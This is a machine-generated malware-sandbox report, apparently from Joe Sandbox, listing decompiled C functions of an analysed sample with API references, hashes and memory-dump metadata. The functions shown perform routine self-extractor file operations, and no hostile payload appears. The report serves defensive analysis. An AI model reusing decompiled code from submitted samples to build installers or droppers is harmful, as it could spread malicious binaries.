                                                                      • Opcode Fuzzy Hash: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                      • Instruction Fuzzy Hash: 1241F337A041079BCF25BF28DD486F973A5EB45320F084669E88297285DA35FE4AF750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84C37(signed int __ecx, int __edx, int _a4) {
                                                                      				struct _FILETIME _v12;
                                                                      				struct _FILETIME _v20;
                                                                      				FILETIME* _t14;
                                                                      				int _t15;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t21 = __ecx * 0x18;
                                                                      				if( *((intOrPtr*)(_t21 + 0xf88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t14 =  &_v12;
                                                                      					_t15 = SetFileTime( *(_t21 + 0xf88d74), _t14, _t14, _t14); // executed
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					return 1;
                                                                      				}
                                                                      			}









                                                                      APIs
                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F84C54
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F84C66
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F84C7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$DateLocal
                                                                      • String ID:
                                                                      • API String ID: 2071732420-0
                                                                      • Opcode ID: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                      • Instruction ID: 35dd3069a43dfde606291448e465da8e6c913a1a7a62e06b04a6584ebb1aabce
                                                                      • Opcode Fuzzy Hash: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                      • Instruction Fuzzy Hash: 0FF03072A0120EAFAB25EFB5CC49DFB77ADEB05250B44452BB915C1051EA30E914FBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00F8487A(CHAR* __ecx, signed int __edx) {
                                                                      				void* _t7;
                                                                      				CHAR* _t11;
                                                                      				long _t18;
                                                                      				long _t23;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				asm("sbb edi, edi");
                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                      				if((__edx & 0x00000100) == 0) {
                                                                      					asm("sbb esi, esi");
                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                      				} else {
                                                                      					if((__edx & 0x00000400) == 0) {
                                                                      						asm("sbb esi, esi");
                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                      					} else {
                                                                      						_t23 = 1;
                                                                      					}
                                                                      				}
                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                      					return _t7;
                                                                      				} else {
                                                                      					E00F8490C(_t11);
                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                      				}
                                                                      			}








                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00F84A23,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F848DE
                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F84902
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                      • Instruction ID: 75ed903f5eb3362a487a4d0e5458f13746432ed4c5b363cfd67eb3b2fbf019e4
                                                                      • Opcode Fuzzy Hash: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                      • Instruction Fuzzy Hash: 6C014BA3E1257526F724A0294C88FF7555CCB96734F1B0335FDAAE71D1D664AC04A3E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F84AD0(signed int _a4, void* _a8, long _a12) {
                                                                      				signed int _t9;
                                                                      				int _t12;
                                                                      				signed int _t14;
                                                                      				signed int _t15;
                                                                      				void* _t20;
                                                                      				struct HWND__* _t21;
                                                                      				signed int _t24;
                                                                      				signed int _t25;
                                                                      
                                                                      				_t20 =  *0xf8858c; // 0x268
                                                                      				_t9 = E00F83680(_t20);
                                                                      				if( *0xf891d8 == 0) {
                                                                      					_push(_t24);
                                                                      					_t12 = WriteFile( *(0xf88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                      					if(_t12 != 0) {
                                                                      						_t25 = _a12;
                                                                      						if(_t25 != 0xffffffff) {
                                                                      							_t14 =  *0xf89400; // 0x5dc00
                                                                      							_t15 = _t14 + _t25;
                                                                      							 *0xf89400 = _t15;
                                                                      							if( *0xf88184 != 0) {
                                                                      								_t21 =  *0xf88584; // 0x0
                                                                      								if(_t21 != 0) {
                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf893f8, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t25 = _t24 | 0xffffffff;
                                                                      					}
                                                                      					return _t25;
                                                                      				} else {
                                                                      					return _t9 | 0xffffffff;
                                                                      				}
                                                                      			}












                                                                      APIs
                                                                        • Part of subcall function 00F83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                        • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                        • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F84B05
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                      • String ID:
                                                                      • API String ID: 1084409-0
                                                                      • Opcode ID: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                      • Instruction ID: 0189e0df423eecc880a8cf2ceb0677014a3b07264e24c7e85c593ac3b8b22216
                                                                      • Opcode Fuzzy Hash: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                      • Instruction Fuzzy Hash: 1D018C3164020AABDB14AF68DC05BF27759FB84735F098225F9399B1E1CB70E812EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F8658A(char* __ecx, void* __edx, char* _a4) {
                                                                      				intOrPtr _t4;
                                                                      				char* _t6;
                                                                      				char* _t8;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				char* _t16;
                                                                      				intOrPtr* _t17;
                                                                      				void* _t18;
                                                                      				char* _t19;
                                                                      
                                                                      				_t16 = __ecx;
                                                                      				_t10 = __edx;
                                                                      				_t17 = __ecx;
                                                                      				_t1 = _t17 + 1; // 0xf88b3f
                                                                      				_t12 = _t1;
                                                                      				do {
                                                                      					_t4 =  *_t17;
                                                                      					_t17 = _t17 + 1;
                                                                      				} while (_t4 != 0);
                                                                      				_t18 = _t17 - _t12;
                                                                      				_t2 = _t18 + 1; // 0xf88b40
                                                                      				if(_t2 < __edx) {
                                                                      					_t19 = _t18 + __ecx;
                                                                      					if(_t19 > __ecx) {
                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                      						if( *_t8 != 0x5c) {
                                                                      							 *_t19 = 0x5c;
                                                                      							_t19 =  &(_t19[1]);
                                                                      						}
                                                                      					}
                                                                      					_t6 = _a4;
                                                                      					 *_t19 = 0;
                                                                      					while( *_t6 == 0x20) {
                                                                      						_t6 = _t6 + 1;
                                                                      					}
                                                                      					return E00F816B3(_t16, _t10, _t6);
                                                                      				}
                                                                      				return 0x8007007a;
                                                                      			}













                                                                      APIs
                                                                      • CharPrevA.USER32(00F88B3E,00F88B3F,00000001,00F88B3E,-00000003,?,00F860EC,00F81140,?), ref: 00F865BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrev
                                                                      • String ID:
                                                                      • API String ID: 122130370-0
                                                                      • Opcode ID: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                      • Instruction ID: c6337546023b03c89c79c784f38b635b51d11465c4c9719c5a25ade792e98a6b
                                                                      • Opcode Fuzzy Hash: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                      • Instruction Fuzzy Hash: F1F04C335042509BD331291D9884BF6BFDEDB86360F2C016EF8DACB205DA658C46A3A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F8621E() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t5;
                                                                      				void* _t9;
                                                                      				void* _t13;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t5 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t5 ^ _t21;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					0x4f0 = 2;
                                                                      					_t9 = E00F8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                      				} else {
                                                                      					E00F844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					_t9 = 0;
                                                                      				}
                                                                      				return E00F86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                      			}












                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F8623F
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                      • String ID:
                                                                      • API String ID: 381621628-0
                                                                      • Opcode ID: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                      • Instruction ID: 48bf8b38bb1ee1e9294c63d40cfbfc9435cea2e0aa12b4b58f00933a0f441f48
                                                                      • Opcode Fuzzy Hash: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                      • Instruction Fuzzy Hash: 1EF082B1744208ABEB50FF749D06FFE77ACDB54700F4004AAB986DA191ED789D44A750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84B60(signed int _a4) {
                                                                      				signed int _t9;
                                                                      				signed int _t15;
                                                                      
                                                                      				_t15 = _a4 * 0x18;
                                                                      				if( *((intOrPtr*)(_t15 + 0xf88d64)) != 1) {
                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xf88d74)); // executed
                                                                      					if(_t9 == 0) {
                                                                      						return _t9 | 0xffffffff;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                      					return 0;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d68)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d70)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d6c)) = 0;
                                                                      				return 0;
                                                                      			}






                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F84FA1,00000000), ref: 00F84B98
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                      • Instruction ID: 65394b9ebd2cb5263d3f6b7a779efc780a38a34a9a7aca0aebe99d9ce0dcf97a
                                                                      • Opcode Fuzzy Hash: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                      • Instruction Fuzzy Hash: E6F01932D40B099E8772DF79CC016D2BBE4EAD53E0350092EA46ED2191EB30A542FBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F866AE(CHAR* __ecx) {
                                                                      				unsigned int _t1;
                                                                      
                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                      				if(_t1 != 0xffffffff) {
                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}





                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,00F84777,?,00F84E38,?), ref: 00F866B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                      • Instruction ID: f8394646367cd87c14a98acb2c54106737f66a7db714fdeb3e836cd0e731b044
                                                                      • Opcode Fuzzy Hash: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                      • Instruction Fuzzy Hash: C7B09276622484426A2016316C295A63841F6C123A7E41B91F032C01E0DA3EC846E204
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84CA0(long _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x00f84caa
                                                                      0x00f84cb1

                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F84CAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: d111df0f163a4943a9a33bd17f7f1068d309b910c6c0aaaba0c052e0c28cb58d
                                                                      • Instruction ID: 76b02aa4ffab6dc0fcd00c1c33d622c7b0d824558ee42fac5c8d1a0ba3af19f2
                                                                      • Opcode Fuzzy Hash: d111df0f163a4943a9a33bd17f7f1068d309b910c6c0aaaba0c052e0c28cb58d
                                                                      • Instruction Fuzzy Hash: 7DB0123214420CB7DF001FC2EC09FD53F1DE7C4761F240041F60C450508A7294109796
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84CC0(void* _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x00f84cc8
                                                                      0x00f84ccf

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 821e44d9dcacae2e35d4cd69b95fea99c3e0892e2bb25ab91cc93a2dcb048d54
                                                                      • Instruction ID: 4d5319bb4e46c9206b2b26146e1d0db56b6b5eaa1c9cfe98547632b1404dd396
                                                                      • Opcode Fuzzy Hash: 821e44d9dcacae2e35d4cd69b95fea99c3e0892e2bb25ab91cc93a2dcb048d54
                                                                      • Instruction Fuzzy Hash: 62B0123100010CB78F001B42EC088953F1DD6C02607000051F50C451218B3398119685
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00F85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				CHAR* _v265;
                                                                      				char _v266;
                                                                      				char _v267;
                                                                      				char _v268;
                                                                      				CHAR* _v272;
                                                                      				char _v276;
                                                                      				signed int _v296;
                                                                      				char _v556;
                                                                      				signed int _t61;
                                                                      				int _t63;
                                                                      				char _t67;
                                                                      				CHAR* _t69;
                                                                      				signed int _t71;
                                                                      				void* _t75;
                                                                      				char _t79;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      				void* _t87;
                                                                      				intOrPtr _t88;
                                                                      				void* _t100;
                                                                      				intOrPtr _t101;
                                                                      				CHAR* _t104;
                                                                      				intOrPtr _t105;
                                                                      				void* _t111;
                                                                      				void* _t115;
                                                                      				CHAR* _t118;
                                                                      				void* _t119;
                                                                      				void* _t127;
                                                                      				CHAR* _t129;
                                                                      				void* _t132;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      				CHAR* _t144;
                                                                      				void* _t145;
                                                                      				void* _t146;
                                                                      				void* _t147;
                                                                      				void* _t149;
                                                                      				char _t155;
                                                                      				void* _t157;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      				char _t167;
                                                                      				char _t170;
                                                                      				CHAR* _t173;
                                                                      				void* _t177;
                                                                      				intOrPtr* _t183;
                                                                      				intOrPtr* _t192;
                                                                      				CHAR* _t199;
                                                                      				void* _t200;
                                                                      				CHAR* _t201;
                                                                      				void* _t205;
                                                                      				void* _t206;
                                                                      				int _t209;
                                                                      				void* _t210;
                                                                      				void* _t212;
                                                                      				void* _t213;
                                                                      				CHAR* _t218;
                                                                      				intOrPtr* _t219;
                                                                      				intOrPtr* _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t223;
                                                                      
                                                                      				_t173 = __ecx;
                                                                      				_t61 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t61 ^ _t221;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t209 = 1;
                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                      					_t63 = 1;
                                                                      				} else {
                                                                      					L2:
                                                                      					while(_t209 != 0) {
                                                                      						_t67 =  *_t173;
                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                      							_t173 = CharNextA(_t173);
                                                                      							continue;
                                                                      						}
                                                                      						_v272 = _t173;
                                                                      						if(_t67 == 0) {
                                                                      							break;
                                                                      						} else {
                                                                      							_t69 = _v272;
                                                                      							_t177 = 0;
                                                                      							_t213 = 0;
                                                                      							_t163 = 0;
                                                                      							_t202 = 1;
                                                                      							do {
                                                                      								if(_t213 != 0) {
                                                                      									if(_t163 != 0) {
                                                                      										break;
                                                                      									} else {
                                                                      										goto L21;
                                                                      									}
                                                                      								} else {
                                                                      									_t69 =  *_t69;
                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                      										break;
                                                                      									} else {
                                                                      										_t69 = _v272;
                                                                      										L21:
                                                                      										_t155 =  *_t69;
                                                                      										if(_t155 != 0x22) {
                                                                      											if(_t202 >= 0x104) {
                                                                      												goto L106;
                                                                      											} else {
                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                      												_t177 = _t177 + 1;
                                                                      												_t202 = _t202 + 1;
                                                                      												_t157 = 1;
                                                                      												goto L30;
                                                                      											}
                                                                      										} else {
                                                                      											if(_v272[1] == 0x22) {
                                                                      												if(_t202 >= 0x104) {
                                                                      													L106:
                                                                      													_t63 = 0;
                                                                      													L125:
                                                                      													_pop(_t210);
                                                                      													_pop(_t212);
                                                                      													_pop(_t162);
                                                                      													return E00F86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                      												} else {
                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                      													_t177 = _t177 + 1;
                                                                      													_t202 = _t202 + 1;
                                                                      													_t157 = 2;
                                                                      													goto L30;
                                                                      												}
                                                                      											} else {
                                                                      												_t157 = 1;
                                                                      												if(_t213 != 0) {
                                                                      													_t163 = 1;
                                                                      												} else {
                                                                      													_t213 = 1;
                                                                      												}
                                                                      												goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L131;
                                                                      								L30:
                                                                      								_v272 =  &(_v272[_t157]);
                                                                      								_t69 = _v272;
                                                                      							} while ( *_t69 != 0);
                                                                      							if(_t177 >= 0x104) {
                                                                      								E00F86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                      								asm("int3");
                                                                      								_push(_t221);
                                                                      								_t222 = _t223;
                                                                      								_t71 =  *0xf88004; // 0x644c7055
                                                                      								_v296 = _t71 ^ _t223;
                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                      									0x4f0 = 2;
                                                                      									_t75 = E00F8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                      								} else {
                                                                      									E00F844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                      									 *0xf89124 = E00F86285();
                                                                      									_t75 = 0;
                                                                      								}
                                                                      								return E00F86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                      							} else {
                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                      								if(_t213 == 0) {
                                                                      									if(_t163 != 0) {
                                                                      										goto L34;
                                                                      									} else {
                                                                      										goto L40;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t163 != 0) {
                                                                      										L40:
                                                                      										_t79 = _v268;
                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                      											if(_t83 == 0) {
                                                                      												_t202 = 0x521;
                                                                      												E00F844B9(0, 0x521, 0xf81140, 0, 0x40, 0);
                                                                      												_t85 =  *0xf88588; // 0x0
                                                                      												if(_t85 != 0) {
                                                                      													CloseHandle(_t85);
                                                                      												}
                                                                      												ExitProcess(0);
                                                                      											}
                                                                      											_t87 = _t83 - 4;
                                                                      											if(_t87 == 0) {
                                                                      												if(_v266 != 0) {
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t215 =  &_v268 + _t167;
                                                                      														_t183 =  &_v268 + _t167;
                                                                      														_t50 = _t183 + 1; // 0x1
                                                                      														_t202 = _t50;
                                                                      														do {
                                                                      															_t88 =  *_t183;
                                                                      															_t183 = _t183 + 1;
                                                                      														} while (_t88 != 0);
                                                                      														if(_t183 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t205 = 0x5b;
                                                                      															if(E00F8667F(_t215, _t205) == 0) {
                                                                      																L115:
                                                                      																_t206 = 0x5d;
                                                                      																if(E00F8667F(_t215, _t206) == 0) {
                                                                      																	L117:
                                                                      																	_t202 =  &_v276;
                                                                      																	_v276 = _t167;
                                                                      																	if(E00F85C17(_t215,  &_v276) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		_t202 = 0x104;
                                                                      																		E00F81680(0xf88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                      																	}
                                                                      																} else {
                                                                      																	_t202 = 0x5b;
                                                                      																	if(E00F8667F(_t215, _t202) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		goto L117;
                                                                      																	}
                                                                      																}
